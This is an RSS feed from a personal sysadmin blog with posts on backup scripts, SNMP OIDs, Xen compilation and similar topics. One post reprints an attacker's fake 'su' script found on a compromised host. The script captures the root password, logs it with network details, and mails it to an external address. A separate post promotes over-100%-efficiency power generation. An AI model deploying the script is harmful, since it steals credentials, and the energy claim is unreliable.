<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Todd Smith Org</title>
	<atom:link href="http://www.toddsmith.org/wordpress/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.toddsmith.org/wordpress</link>
	<description>Just another WordPress weblog</description>
	<lastBuildDate>Wed, 28 Nov 2012 10:14:20 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.4.2</generator>
		<item>
		<title>Quick Script to help you archive all those IOMega ZIP Disks</title>
		<link>http://www.toddsmith.org/wordpress/uncategorized/quick-script-to-help-you-archive-all-those-iomega-zip-disks/</link>
		<comments>http://www.toddsmith.org/wordpress/uncategorized/quick-script-to-help-you-archive-all-those-iomega-zip-disks/#comments</comments>
		<pubDate>Wed, 28 Nov 2012 10:13:59 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.toddsmith.org/wordpress/?p=229</guid>
		<description><![CDATA[base_file="Zip100_" base_dir="/Users/smith/Documents/GraphicDesign" while true ; do if [ -d "/Volumes/Zip 100" ] ; then vol_dir="/Volumes/Zip 100" elif [ -d "/Volumes/ZIP-100" ] ; then vol_dir="/Volumes/ZIP-100" elif [ -d "/Volumes/100zip" ] ; then vol_dir="/Volumes/100zip" fi if [ -d "${vol_dir}" ] ; then ls -1 $base_dir last=`ls -1 $base_dir/ &#124; cut -f2 -d_ &#124; tail -n1 &#124; sed [...]]]></description>
			<content:encoded><![CDATA[<pre>
base_file="Zip100_"
base_dir="/Users/smith/Documents/GraphicDesign"


while true ; do

    if [ -d "/Volumes/Zip 100" ] ; then
        vol_dir="/Volumes/Zip 100"
    elif [ -d "/Volumes/ZIP-100" ] ; then
        vol_dir="/Volumes/ZIP-100"
    elif [ -d "/Volumes/100zip" ] ; then
        vol_dir="/Volumes/100zip"
    fi

    if [ -d "${vol_dir}" ] ; then

        ls -1 $base_dir
        last=`ls -1 $base_dir/ | cut -f2 -d_ | tail -n1 | sed "s,^[0],,g"`
        echo "Last: ${base_dir}/${base_file}`printf '%02d' ${last}`/"
        if [ -f "${base_dir}/${base_file}`printf '%02d' ${last}`/.done" ] ; then
                #move to next one
                echo "${base_dir}/${base_file}`printf '%02d' ${last}`/ is DONE"
                next=`printf "%02d" $(($last + 1))`
                echo Next is "${base_dir}/${base_file}${next}/"
                mkdir "${base_dir}/${base_file}${next}/" &#038;&#038; \
                rsync -av --progress --stats "${vol_dir}/"* "${base_dir}/${base_file}${next}/" &#038;&#038; \
                touch "${base_dir}/${base_file}${next}/.done" &#038;&#038; \
                hdiutil detach "${vol_dir}"
        else
                #rsync copy to last &#038;&#038; \
                rsync -av --progress --stats "${vol_dir}/"* "${base_dir}/${base_file}`printf '%02d' ${last}`/" &#038;&#038; \
                touch "${base_dir}/${base_file}`printf '%02d' ${last}`/.done" &#038;&#038; \
                hdiutil detach "${vol_dir}"
        fi

        sleep 10

    else

        echo "Volume does not exist, sleeping for 5 seconds"
        sleep 5

    fi

done
</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.toddsmith.org/wordpress/uncategorized/quick-script-to-help-you-archive-all-those-iomega-zip-disks/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Stream HD Video to Your Wii</title>
		<link>http://www.toddsmith.org/wordpress/hacks/stream-hd-video-to-your-wii/</link>
		<comments>http://www.toddsmith.org/wordpress/hacks/stream-hd-video-to-your-wii/#comments</comments>
		<pubDate>Tue, 21 Sep 2010 13:47:37 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hacks?]]></category>

		<guid isPermaLink="false">http://www.toddsmith.org/wordpress/?p=220</guid>
		<description><![CDATA[The power of the WII limits what kind of files you can stream (up to 720 wide) videos. High Def videos (1280 &#38; 1920 wide) will not play. Get WIIMC from http://www.wiimc.org/downloads/ , install for HomeBrew channel Get and install VLC on your PC. www.videolan.org]]></description>
			<content:encoded><![CDATA[<p>The power of the WII limits what kind of files you can stream (up to 720  wide) videos.  High Def videos (1280 &amp; 1920 wide) will not play.</p>
<ol>
<li>Get WIIMC from http://www.wiimc.org/downloads/ , install for HomeBrew channel</li>
<li>Get and install VLC on your PC. www.videolan.org</li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.toddsmith.org/wordpress/hacks/stream-hd-video-to-your-wii/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Softbank BB DNS Server IP addresses</title>
		<link>http://www.toddsmith.org/wordpress/hacks/softbank-bb-dns-server-ip-addresses/</link>
		<comments>http://www.toddsmith.org/wordpress/hacks/softbank-bb-dns-server-ip-addresses/#comments</comments>
		<pubDate>Tue, 06 Jul 2010 09:13:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Hacks?]]></category>

		<guid isPermaLink="false">http://www.toddsmith.org/wordpress/?p=217</guid>
		<description><![CDATA[I pay a significant amount of money, (around $55/mo) for my 100Mb VDSL connection here at home in Tokyo. I did not wish to pay the $6/mo rental fee to use their router, so I build my own using ClarkConnect. The problem is that they would not give me the DNS information? Are you kidding [...]]]></description>
			<content:encoded><![CDATA[<p>I pay a significant amount of money, (around $55/mo) for my 100Mb VDSL connection here at home in Tokyo. I did not wish to pay the $6/mo rental fee to use their router, so I build my own using ClarkConnect. The problem is that they would not give me the DNS information? Are you kidding me? They didn&#8217;t even know what &#8220;DNS server IP address&#8221; was. I talked to two different technical support groups but was very disappointed with the Softbank technical support. Finally, I told them I bought my own router, and they transferred me to the second technical group who told me that there was a $20 fee for configuration setting information. Asses. Anyways, after hacking around a little in the Japanese Router OS, I found what I was looking for. I figured I&#8217;d post them here for anyone else who may be looking for them.</p>
<p>218.176.253.65<br />
218.176.253.97</p>
]]></content:encoded>
			<wfw:commentRss>http://www.toddsmith.org/wordpress/hacks/softbank-bb-dns-server-ip-addresses/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>fufezanu@yahoo.es</title>
		<link>http://www.toddsmith.org/wordpress/security-technology/fufezanuyahooes/</link>
		<comments>http://www.toddsmith.org/wordpress/security-technology/fufezanuyahooes/#comments</comments>
		<pubDate>Mon, 05 Jul 2010 19:46:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Security Technology]]></category>

		<guid isPermaLink="false">http://www.toddsmith.org/wordpress/?p=213</guid>
		<description><![CDATA[Hackers files I&#8217;ve found laying around: /usr/include/gpm2.h /usr/share/local/cs/rootexec /usr/share/local/ca/rootexec ~/.ssh/.sh #!/bin/sh # # by CorteZ @ #Linux-Team # while [ "$pass" = "" ]; do echo -en &#8220;Password:&#8221; read -s pass done if [ $# != 1 ]; then echo &#8220;[`date`]&#8221; >> ~/.xdm01 2>/dev/null echo &#8220;[+] User: `id &#124; cut -d&#8221;(&#8221; -f2 &#124; cut -d&#8221;)&#8221; [...]]]></description>
			<content:encoded><![CDATA[<p>Hackers files I&#8217;ve found laying around:</p>
<p>/usr/include/gpm2.h<br />
/usr/share/local/cs/rootexec<br />
/usr/share/local/ca/rootexec<br />
~/.ssh/.sh</p>
<p>#!/bin/sh<br />
#<br />
# by CorteZ @ #Linux-Team<br />
#</p>
<p>while [ "$pass" = "" ]; do<br />
echo -en &#8220;Password:&#8221;<br />
read -s pass<br />
done<br />
if [ $# != 1 ]; then<br />
echo &#8220;[`date`]&#8221; >> ~/.xdm01 2>/dev/null<br />
echo &#8220;[+] User: `id | cut -d&#8221;(&#8221; -f2 | cut -d&#8221;)&#8221; -f1` ~ Remote: $1 ~ Parola: $pass&#8221; >> ~/.xdm01 2>/dev/null<br />
echo &#8220;`/sbin/ifconfig |grep inet`&#8221; >> ~/.xdm01 2>/dev/null<br />
cat ~/.xdm01 | mail -s &#8216;SU report&#8217; fufezanu@yahoo.es 2>/dev/null<br />
/bin/su<br />
unset pass<br />
fi<br />
echo &#8220;[`date`]&#8221; >> ~/.xdm01 2>/dev/null<br />
echo &#8220;[+] User: `id` ~ Parola: $pass&#8221; >> ~/.xdm01 2>/dev/null<br />
cat ~/.xdm01 | mail -s &#8216;SU report&#8217; fufezanu@yahoo.es 2>/dev/null<br />
/bin/su<br />
unset pass</p>
]]></content:encoded>
			<wfw:commentRss>http://www.toddsmith.org/wordpress/security-technology/fufezanuyahooes/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Greater than 100% efficiency power generation</title>
		<link>http://www.toddsmith.org/wordpress/energy/greater-than-100-efficiency-power-generation/</link>
		<comments>http://www.toddsmith.org/wordpress/energy/greater-than-100-efficiency-power-generation/#comments</comments>
		<pubDate>Thu, 08 Apr 2010 05:16:20 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Energy]]></category>
		<category><![CDATA[Add new tag]]></category>
		<category><![CDATA[Electric]]></category>
		<category><![CDATA[HHO]]></category>
		<category><![CDATA[hydroger]]></category>
		<category><![CDATA[oxyhydrogen]]></category>
		<category><![CDATA[thermal deplymerization]]></category>
		<category><![CDATA[water]]></category>

		<guid isPermaLink="false">http://www.toddsmith.org/wordpress/uncategorized/greater-than-100-efficiency-power-generation/</guid>
		<description><![CDATA[Electric Power Generator: http://www.youtube.com/watch?v=12uGhGPkzoA&#038;feature=related Water (Oxyhyrdrogen) Thermal Deploymerization http://www.youtube.com/watch?v=CWf9nYbm3ac&#038;feature=related]]></description>
			<content:encoded><![CDATA[<p>Electric Power Generator:</p>
<p>http://www.youtube.com/watch?v=12uGhGPkzoA&#038;feature=related</p>
<p>Water (Oxyhyrdrogen)</p>
<p><iframe width="500" height="375" src="http://www.youtube.com/embed/x56k9q-0QIo?fs=1&#038;feature=oembed" frameborder="0" allowfullscreen></iframe></p>
<p>Thermal Deploymerization</p>
<p>http://www.youtube.com/watch?v=CWf9nYbm3ac&#038;feature=related</p>
]]></content:encoded>
			<wfw:commentRss>http://www.toddsmith.org/wordpress/energy/greater-than-100-efficiency-power-generation/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Areca 1280 ML SNMP OIDs</title>
		<link>http://www.toddsmith.org/wordpress/network-monitoring/areca-1280-ml-snmp-oids/</link>
		<comments>http://www.toddsmith.org/wordpress/network-monitoring/areca-1280-ml-snmp-oids/#comments</comments>
		<pubDate>Mon, 05 Apr 2010 08:27:07 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network Monitoring]]></category>

		<guid isPermaLink="false">http://www.toddsmith.org/wordpress/?p=204</guid>
		<description><![CDATA[Areca 1280 ML SNMP OIDs HW TEMP .1.3.6.1.4.1.18928.1.1.2.1.0 HDD SLOTS (walk) .1.3.6.1.4.1.18928.1.1.3.1.1.1 RAID NUMBER .1.3.6.1.4.1.18928.1.1.4.1.1.1 RAID STATE .1.3.6.1.4.1.18928.1.1.4.1.1.4.0 VOL NUMBER .1.3.6.1.4.1.18928.1.1.5.1.1.1 VOL STATE (Vol1) .1.3.6.1.4.1.18928.1.1.5.1.1.5.0 VOL STATE (Vol2) .1.3.6.1.4.1.18928.1.1.5.1.1.5.1 VOL CAPACITY (Vol1) .1.3.6.1.4.1.18928.1.1.5.1.1.4.0 VOL CAPACITY (Vol2) .1.3.6.1.4.1.18928.1.1.5.1.1.4.1 Event Strings (Walk) .1.3.6.1.4.1.18928.1.1.6.1.1.2.X /opt/wansecurity/bin/snmpwalk -v2c -c public HOSTNAME .1.3.6.1.4.1.18928.1.1.6.1.1.2]]></description>
			<content:encoded><![CDATA[<h3>Areca 1280 ML SNMP OIDs</h3>
<table>
<tr>
<td>HW TEMP</td>
<td>.1.3.6.1.4.1.18928.1.1.2.1.0</td>
</tr>
<tr>
<td>HDD SLOTS (walk)</td>
<td>.1.3.6.1.4.1.18928.1.1.3.1.1.1</td>
</tr>
<tr>
<td>RAID NUMBER</td>
<td>.1.3.6.1.4.1.18928.1.1.4.1.1.1</td>
</tr>
<tr>
<td>RAID STATE</td>
<td>.1.3.6.1.4.1.18928.1.1.4.1.1.4.0</td>
</tr>
<tr>
<td>VOL NUMBER</td>
<td>.1.3.6.1.4.1.18928.1.1.5.1.1.1</td>
</tr>
<tr>
<td>VOL STATE (Vol1)</td>
<td>.1.3.6.1.4.1.18928.1.1.5.1.1.5.0</td>
</tr>
<tr>
<td>VOL STATE (Vol2)</td>
<td>.1.3.6.1.4.1.18928.1.1.5.1.1.5.1</td>
</tr>
<tr>
<td>VOL CAPACITY (Vol1)</td>
<td>.1.3.6.1.4.1.18928.1.1.5.1.1.4.0</td>
</tr>
<tr>
<td>VOL CAPACITY (Vol2)</td>
<td>.1.3.6.1.4.1.18928.1.1.5.1.1.4.1</td>
</tr>
<tr>
<td>Event Strings (Walk)</td>
<td>.1.3.6.1.4.1.18928.1.1.6.1.1.2.X</td>
</tr>
</table>
<p>/opt/wansecurity/bin/snmpwalk -v2c -c public HOSTNAME .1.3.6.1.4.1.18928.1.1.6.1.1.2</p>
]]></content:encoded>
			<wfw:commentRss>http://www.toddsmith.org/wordpress/network-monitoring/areca-1280-ml-snmp-oids/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>NetBotz (RackBotz) 310 SNMP OIDs</title>
		<link>http://www.toddsmith.org/wordpress/windows-administration/netbotz-rackbotz-310-snmp-oids/</link>
		<comments>http://www.toddsmith.org/wordpress/windows-administration/netbotz-rackbotz-310-snmp-oids/#comments</comments>
		<pubDate>Mon, 05 Apr 2010 07:46:12 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network Monitoring]]></category>
		<category><![CDATA[Windows Administration]]></category>

		<guid isPermaLink="false">http://www.toddsmith.org/wordpress/?p=199</guid>
		<description><![CDATA[SNMP OIDs TEMP .1.3.6.1.4.1.5528.30.10.1.0 HUMIDITY .1.3.6.1.4.1.5528.30.10.2.0 AIR FLOW .1.3.6.1.4.1.5528.30.10.3.0 AUDIO .1.3.6.1.4.1.5528.30.10.4.0 DOOR AJAR .1.3.6.1.4.1.5528.30.10.5.0 HOSTNAME .1.3.6.1.4.1.5528.50.1.0 DOMAIN .1.3.6.1.4.1.5528.50.2.0 SMTP SERVER .1.3.6.1.4.1.5528.50.8.0 SERIAL NUMBER .1.3.6.1.4.1.5528.50.17.0 SYSLOG ADDRESS .1.3.6.1.4.1.5528.50.54.0]]></description>
			<content:encoded><![CDATA[<h3>SNMP OIDs</h3>
<table>
<tr>
<td>TEMP</td>
<td>.1.3.6.1.4.1.5528.30.10.1.0</td>
</tr>
<tr>
<td>HUMIDITY</td>
<td>.1.3.6.1.4.1.5528.30.10.2.0</td>
</tr>
<tr>
<td>AIR FLOW</td>
<td>.1.3.6.1.4.1.5528.30.10.3.0</td>
</tr>
<tr>
<td>AUDIO</td>
<td>.1.3.6.1.4.1.5528.30.10.4.0</td>
</tr>
<tr>
<td>DOOR AJAR</td>
<td>.1.3.6.1.4.1.5528.30.10.5.0</td>
</tr>
<tr>
<td>HOSTNAME</td>
<td>.1.3.6.1.4.1.5528.50.1.0</td>
</tr>
<tr>
<td>DOMAIN</td>
<td>.1.3.6.1.4.1.5528.50.2.0</td>
</tr>
<tr>
<td>SMTP SERVER</td>
<td>.1.3.6.1.4.1.5528.50.8.0</td>
</tr>
<tr>
<td>SERIAL NUMBER</td>
<td>.1.3.6.1.4.1.5528.50.17.0</td>
</tr>
<tr>
<td>SYSLOG ADDRESS</td>
<td>.1.3.6.1.4.1.5528.50.54.0</td>
</tr>
</table>
]]></content:encoded>
			<wfw:commentRss>http://www.toddsmith.org/wordpress/windows-administration/netbotz-rackbotz-310-snmp-oids/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Compile Xen 3.4.1 on Ubuntu Howto</title>
		<link>http://www.toddsmith.org/wordpress/uncategorized/compile-xen-341-on-ubuntu-howto/</link>
		<comments>http://www.toddsmith.org/wordpress/uncategorized/compile-xen-341-on-ubuntu-howto/#comments</comments>
		<pubDate>Mon, 05 Apr 2010 07:36:27 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://www.toddsmith.org/wordpress/?p=177</guid>
		<description><![CDATA[These are the commands that I used to compile and install Xen 3.4.1 on my Ubuntu Server. sudo su - apt-get update apt-get upgrade dpkg-reconfigure tzdata echo 'export EDITOR=/usr/bin/vi' >> /etc/profile apt-get remove exim4 exim4-base lpr nfs-common portmap pidentd pcmcia-cs pppoe pppoeconf ppp pppconfig apt-get install build-essential g++ apt-get install python-dev python-twisted apt-get install bridge-utils [...]]]></description>
			<content:encoded><![CDATA[<p>These are the commands that I used to compile and install Xen 3.4.1 on my Ubuntu Server.</p>
<pre>
sudo su -
apt-get update
apt-get upgrade
dpkg-reconfigure tzdata
echo 'export EDITOR=/usr/bin/vi' >> /etc/profile
apt-get remove exim4 exim4-base lpr nfs-common portmap pidentd pcmcia-cs pppoe pppoeconf ppp pppconfig
apt-get install build-essential g++
apt-get install python-dev python-twisted
apt-get install bridge-utils
apt-get install debootstrap
apt-get install reiserfsprogs
apt-get install mercurial
apt-get install gawk
apt-get install gettext openssl zlib1g-dev openssl libssl-dev libx11-dev
apt-get install libx86-dev bin86 bcc ncurses-dev texinfo
mkdir /usr/src/XEN
cd !$
wget http://bits.xensource.com/oss-xen/release/3.4.1/xen-3.4.1.tar.gz

hg clone http://xenbits.xensource.com/linux-2.6.18-xen.hg

tar zxf xen-3.4.1.tar.gz
cd xen-3.4.1

make prep-kernels

make dist

make install
</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.toddsmith.org/wordpress/uncategorized/compile-xen-341-on-ubuntu-howto/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Howto change keyboard encoding for OpenBSD</title>
		<link>http://www.toddsmith.org/wordpress/unix-administration/howto-change-keyboard-encoding-for-openbsd/</link>
		<comments>http://www.toddsmith.org/wordpress/unix-administration/howto-change-keyboard-encoding-for-openbsd/#comments</comments>
		<pubDate>Mon, 05 Apr 2010 07:35:56 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Unix Administration]]></category>

		<guid isPermaLink="false">http://www.toddsmith.org/wordpress/?p=126</guid>
		<description><![CDATA[To change the keyboard encoding on OpenBSD 4.4 set keyboard.encoding=?? where ?? is your country code. For example, I wanted to change the keyboard encoding to Japanese. So I set keyboard.encoding=jp in /etc/wsconsctl.conf To enable the change immediately from the command line you can type: wsconsctl -w keyboard.encoding=jp]]></description>
			<content:encoded><![CDATA[<p>To change the keyboard encoding on OpenBSD 4.4 set keyboard.encoding=?? where ?? is your country code. </p>
<p>For example, I wanted to change the keyboard encoding to Japanese. So I set</p>
<p>keyboard.encoding=jp</p>
<p>in /etc/wsconsctl.conf</p>
<p>To enable the change immediately from the command line you can type:</p>
<p class="code">
wsconsctl -w keyboard.encoding=jp</p>
]]></content:encoded>
			<wfw:commentRss>http://www.toddsmith.org/wordpress/unix-administration/howto-change-keyboard-encoding-for-openbsd/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Issue compiling cairo-1.9.6 / rrdtool on CentOS / Snowleopard</title>
		<link>http://www.toddsmith.org/wordpress/network-monitoring/issue-compiling-cairo-196-rrdtool-on-centos-snowleopard/</link>
		<comments>http://www.toddsmith.org/wordpress/network-monitoring/issue-compiling-cairo-196-rrdtool-on-centos-snowleopard/#comments</comments>
		<pubDate>Fri, 19 Mar 2010 04:13:09 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network Monitoring]]></category>
		<category><![CDATA[Compiling]]></category>

		<guid isPermaLink="false">http://www.toddsmith.org/wordpress/?p=195</guid>
		<description><![CDATA[I kept getting the following error in rrdtool&#8217;s config.log libcairo.so: undefined reference to `pthread_mutexattr_settype' Reverting to version 1.8.0 allowed me to get RRDTool compiled and functioning How dare I think something was wrong with rrdtool!]]></description>
			<content:encoded><![CDATA[<p>I kept getting the following error in rrdtool&#8217;s config.log</p>
<p><code><br />
libcairo.so: undefined reference to `pthread_mutexattr_settype'<br />
</code></p>
<p>
Reverting to version 1.8.0 allowed me to get RRDTool compiled and functioning
</p>
<p>How dare I think something was wrong with rrdtool!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.toddsmith.org/wordpress/network-monitoring/issue-compiling-cairo-196-rrdtool-on-centos-snowleopard/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
